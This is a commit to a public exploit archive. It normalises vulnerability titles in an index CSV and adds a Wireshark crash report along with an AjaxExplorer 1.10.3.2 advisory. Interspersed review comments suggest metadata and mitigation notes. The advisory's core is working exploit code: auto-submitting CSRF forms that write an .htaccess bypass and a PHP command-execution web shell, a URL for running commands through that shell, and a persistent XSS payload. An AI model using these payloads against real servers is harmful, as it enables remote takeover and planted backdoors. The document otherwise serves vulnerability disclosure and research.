DB: 2016-06-02
2 new exploits GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability GeekLog 2.x - ImageImageMagick.php Remote File Inclusion Vulnerability ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow Vulnerability ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow Vulnerability ImageMagick < 6.9.3-9 - Multiple Vulnerabilities ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick) ImageMagick Delegate Arbitrary Command Execution ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities Wireshark - erf_meta_read_tag SIGSEGV
This commit is contained in:
parent
8164665ff7
commit
3a855523ef
3 changed files with 208 additions and 5 deletions
12
files.csv
12
files.csv
|
@ -3599,7 +3599,7 @@ id,file,description,date,author,platform,type,port
|
|||
3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0
|
||||
3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability",2007-05-17,"Mehmet Ince",php,webapps,0
|
||||
3945,platforms/linux/dos/3945.rb,"MagicISO <= 5.4 (build239) - (.cue) Heap Overflow PoC",2007-05-17,n00b,linux,dos,0
|
||||
3946,platforms/php/webapps/3946.txt,"GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0
|
||||
3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0
|
||||
3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-05-17,"Alkomandoz Hacker",php,webapps,0
|
||||
3948,platforms/php/webapps/3948.txt,"Libstats <= 1.0.3 (template_csv.php) Remote File Inclusion Vulnerability",2007-05-18,"Mehmet Ince",php,webapps,0
|
||||
3949,platforms/php/webapps/3949.txt,"MolyX BOARD 2.5.0 (index.php lang) Local File Inclusion Vulnerability",2007-05-18,MurderSkillz,php,webapps,0
|
||||
|
@ -22657,7 +22657,7 @@ id,file,description,date,author,platform,type,port
|
|||
25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x Viewtopic.php Cross-Site Scripting Vulnerability",2005-04-23,HaCkZaTaN,php,webapps,0
|
||||
25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (1)",2005-04-25,kf,linux,dos,0
|
||||
25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index Vulnerability (2)",2005-04-25,kf,linux,remote,0
|
||||
25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0
|
||||
25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow Vulnerability",2005-04-25,"Damian Put",linux,dos,0
|
||||
25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.php Cross-Site Scripting Vulnerability",2005-04-25,deluxe89,php,webapps,0
|
||||
25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 Default.ASP Multiple SQL Injection Vulnerabilities",2005-04-25,Dcrab,asp,webapps,0
|
||||
25530,platforms/asp/webapps/25530.txt,"OneWorldStore IDOrder Information Disclosure Vulnerability",2005-04-25,Lostmon,asp,webapps,0
|
||||
|
@ -25433,7 +25433,7 @@ id,file,description,date,author,platform,type,port
|
|||
28380,platforms/linux/dos/28380.txt,"Mozilla Firefox 1.0.x JavaScript Handler Race Condition Memory Corruption Vulnerability",2006-08-12,"Michal Zalewski",linux,dos,0
|
||||
28381,platforms/windows/dos/28381.txt,"Microsoft Windows XP/2000/2003 help - Multiple Vulnerabilities",2006-08-12,"Benjamin Tobias Franz",windows,dos,0
|
||||
28382,platforms/php/webapps/28382.txt,"WP-DB Backup For WordPress 1.6/1.7 Edit.php - Directory Traversal Vulnerability",2006-08-14,"marc & shb",php,webapps,0
|
||||
28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0
|
||||
28383,platforms/linux/dos/28383.txt,"ImageMagick 6.x - .SGI Image File Remote Heap Buffer Overflow Vulnerability",2006-08-14,"Damian Put",linux,dos,0
|
||||
28384,platforms/linux/dos/28384.txt,"Libmusicbrainz 2.0.2/2.1.x - Multiple Buffer Overflow Vulnerabilities",2006-08-14,"Luigi Auriemma",linux,dos,0
|
||||
28385,platforms/asp/webapps/28385.txt,"BlaBla 4U Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
|
||||
28386,platforms/linux/dos/28386.txt,"Linux-HA Heartbeat <= 2.0.6 - Remote Denial of Service Vulnerability",2006-08-13,"Yan Rong Ge",linux,dos,0
|
||||
|
@ -35960,7 +35960,7 @@ id,file,description,date,author,platform,type,port
|
|||
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
|
||||
39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0
|
||||
39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0
|
||||
39767,platforms/multiple/dos/39767.txt,"ImageMagick < 6.9.3-9 - Multiple Vulnerabilities",2016-05-04,"Nikolay Ermishkin",multiple,dos,0
|
||||
39767,platforms/multiple/dos/39767.txt,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0
|
||||
39768,platforms/multiple/dos/39768.txt,"OpenSSL Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0
|
||||
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
|
||||
39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
|
||||
|
@ -35982,7 +35982,7 @@ id,file,description,date,author,platform,type,port
|
|||
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
|
||||
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
|
||||
39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
|
||||
39791,platforms/multiple/local/39791.rb,"ImageMagick Delegate Arbitrary Command Execution",2016-05-09,metasploit,multiple,local,0
|
||||
39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0
|
||||
39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
|
||||
39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0
|
||||
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
|
||||
|
@ -36057,3 +36057,5 @@ id,file,description,date,author,platform,type,port
|
|||
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
|
||||
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
|
||||
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
|
||||
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
|
||||
|
|
|
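Review bot: The new 39877 row at line 169 carries no affected-version marker, unlike the neighbouring entries in the same hunk (`CCextractor 0.80 - Crash PoC`, `TCPDump 4.5.1 - Crash PoC`), so the index cannot be searched by version for this one. The advisory it points at only says "current git master", so the most the description can honestly record is `Wireshark (git master) - erf_meta_read_tag SIGSEGV`, with the tested commit noted in the .txt itself. The remaining hunks in this section only normalise existing titles and need nothing.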
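--- /dev/null
+++ b/platforms/multiple/dos/39877.txt
@@ -0,0 +1,24 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=803
+
+The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==28415==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000022d84 (pc 0x7f0e1b0002a2 bp 0x7ffde25a76f0 sp 0x7ffde25a7630 T0)
+#0 0x7f0e1b0002a1 in erf_meta_read_tag wireshark/wiretap/erf.c:1242:13
+#1 0x7f0e1afff0f0 in populate_summary_info wireshark/wiretap/erf.c:1851:27
+#2 0x7f0e1aff34d6 in erf_read wireshark/wiretap/erf.c:447:7
+#3 0x7f0e1b1a746b in wtap_read wireshark/wiretap/wtap.c:1245:7
+#4 0x528196 in load_cap_file wireshark/tshark.c:3478:12
+#5 0x51e67c in main wireshark/tshark.c:2192:13
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV wireshark/wiretap/erf.c:1242:13 in erf_meta_read_tag
+==28415==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12352. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39877.zip
+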
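Review bot: The stack trace places the fault inside libwiretap (erf_meta_read_tag, called from populate_summary_info, erf_read and wtap_read), i.e. while the ERF capture is being read and before any dissection runs, so the `-V` in the quoted tshark command is presumably not what triggers it and any wiretap consumer that opens the file (the Wireshark GUI, editcap, capinfos) is likely exposed as well; a sentence after the trace saying so would help readers triage. The report also pins the version only as "current git master" with no commit hash, so the affected range cannot be reconstructed from the file; a line such as `Tested revision: <wireshark git commit — placeholder>` under "Source:" would fix that, and the linked Wireshark bug 12352 is where the fix status should be checked.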
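--- /dev/null
+++ b/platforms/php/webapps/39876.txt
@@ -0,0 +1,177 @@
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/AJAXEXPLORER-REMOTE-CMD-EXECUTION.txt
+
+[+] ISR: apparitionsec
+
+
+Vendor:
+==========
+sourceforge.net
+smsid
+
+download linx:
+sourceforge.net/projects/ajax-explorer/files/
+
+
+Product:
+=======================
+AjaxExplorer v1.10.3.2
+
+Manage server files through simple windows like interface.
+
+
+Vulnerability Type:
+=======================
+Remote Command Execution
+CSRF
+Persistent XSS
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+
+AjaxExplorer has command terminal feature where you can move, copy, delete
+files etc... also lets a user save commands in a
+flat file named "terminal" under their user profile
+"/ae.user/owner/myprofile".
+
+e.g.
+
+copy [FILEPATH + FILENAME] [FILEPATH]
+create [FILEPATH + FILENAME]
+
+Since AjaxExplorer also suffers from CSRF vulnerability we can exploit the
+application by first creating an .htaccess file with an
+"allow from all" directive to bypass access restrictions, next create
+arbitrary PHP files for remote command execution purposes.
+This exploit will require two consecutive HTTP requests, so we need to
+target an iframe to stay on same page until exploit is completed.
+
+
+Exploit code(s):
+===============
+
+1) first POST request creates .htaccess file so we can bypass directory
+browsing restrictions.
+2) second POST writes our remote command execution file we will then access
+to execute commands on the victim system.
+
+The below P:/ for "strPath" form value is for "Profile"
+
+
+<iframe name="PWNED" style="display:none" name="hidden-form"></iframe>
+
+<form target="PWNED" id="htaccess" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
+method="post">
+<input type="hidden" name="strPage" value="control/file/editor" >
+<input type="hidden" name="strPath" value="P:/" >
+<input type="hidden" name="strFile" value=".htaccess" >
+<input type="hidden" name="strText" value='allow from all' >
+<script>document.getElementById('htaccess').submit()</script>
+</form>
+
+<form target="PWNED" id="RCE" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php"
+method="post">
+<input type="hidden" name="strPage" value="control/file/editor" >
+<input type="hidden" name="strPath" value="P:/" >
+<input type="hidden" name="strFile" value="terminal.php" >
+<input type="hidden" name="strText" value='<?php exec($_GET["cmd"]);?>' >
+<script>document.getElementById('RCE').submit()</script>
+</form>
+
+Now we can access and run arbitrary cmds.
+
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/ae.user/owner/myprofile/terminal.php?cmd=c
+:\\Windows\\system32\\calc.exe
+
+
+/////////////////////////////////////////////////////
+
+
+Here is another way to RCE this application... first create PHP file then
+edit.
+
+<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
+
+<form target="DOOM" id="CSRF2" method="post" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
+<input type="hidden" name="strPage" value="control/file/editor" />
+<input type="hidden" name="strPath" value="D:/" />
+<input type="hidden" name="strFile" value="PWNED.php" />
+<input type="hidden" name="strText"
+value="<?php%20exec($_GET['cmd']);%20?>" />
+</form>
+
+<form target="DOOM" id="CSRF1" method="post" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
+<input type="hidden" name="strPage" value="control/file/create" />
+<input type="hidden" name="strPath" value="D:/" />
+<input type="hidden" name="strFile" value="D:/PWNED.php" />
+<script>
+document.getElementById('CSRF1').submit()
+document.getElementById('CSRF2').submit()
+</script>
+</form>
+
+
+////////////////////////
+
+Persistent XSS:
+================
+
+We can also write persistent XSS payload to the user profile "terminal"
+file.
+
+<form id="XSS" method="post" action="
+http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
+<input type="hidden" name="strPage" value="control/file/editor" />
+<input type="hidden" name="strPath" value="P:/" />
+<input type="hidden" name="strFile" value="terminal" />
+<input type="hidden" name="strText" value="<script>alert(666)</script>" />
+<script>document.getElementById('XSS').submit()</script>
+</form>
+
+
+
+Disclosure Timeline:
+===============================
+Vendor Notification: NA
+June 1, 2016 : Public Disclosure
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+================
+8.0 (High)
+CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+
+hyp3rlinx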
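Review bot: The advisory never states the root cause the three issues share: the `control/file/editor` and `control/file/create` pages accept `strPath`/`strFile`/`strText` from a plain POST with no anti-CSRF token, and the `.htaccess` and `terminal.php` examples show no filename or extension check on what is written into `ae.user/owner/myprofile`, a directory the web server executes PHP from. A short "Root cause" paragraph before "Exploit code(s):" saying this, plus a "Mitigation" line (per-request CSRF token on the editor/create actions, reject `.htaccess` and executable extensions, keep `ae.user` outside the document root or disable PHP execution under it) would make the file useful to defenders, especially since "Vendor Notification: NA" means no fixed version can be cited. Minor: each iframe carries two `name` attributes (`name="PWNED"` / `name="hidden-form"`); HTML parsers keep only the first, so the second should be dropped.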